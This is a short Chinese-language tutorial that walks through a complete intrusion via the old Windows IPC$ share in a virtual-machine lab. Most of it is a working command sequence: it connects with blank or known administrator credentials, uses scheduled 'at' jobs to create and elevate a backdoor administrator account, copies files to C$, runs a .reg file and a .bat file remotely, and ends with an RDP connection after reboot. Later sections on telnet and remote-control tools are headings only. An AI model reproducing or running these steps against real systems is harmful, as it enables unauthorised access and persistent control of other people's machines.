2002-2006年系统经典利用漏洞:ipc$
2. 实例演示-完整入侵过程
(1)纯DOS命令式 入侵
首先构建一个入侵的环境,虚拟机之间能相互通信,即可表示为互联网环境,再扫描,得到有
漏洞的计算机IP
net use \\192.168.38.129 /u:administrator ------------连接扫描到有漏洞大远程计算机(扫描远程电脑无密码)如果有密码
net use \\192.168.38.129 “” /u:administrator--- “”中要输入远程电脑的密码。
net use --------查看是否成功连接
net time \\192.168.38.129 ----查看对方电脑时间
at \\192.168.38.129 09:05 net user hnqdwxf2003 123 /add ---用at命令建立一个用户hnqdwxf2003密码123
at \\192.168.38.129 net localgroup administrators hnqdwxf2003 /add --提升为管理员权限
copy 拖进来\\192.168.38.129\c$
net time \\192.168.38.129 ----再次查看对方电脑时间
at \\192.168.38.129 时间 regedit /s c:\1.reg
或将对方电脑共享盘映射到本机 net use p:\\192.168.38.129 \c$
at \\192.168.38.129 时间 c:\1.bat
等待对方电脑重启,再连连接3389。
(2)利用开启telnet工具
(3)利用远控工具
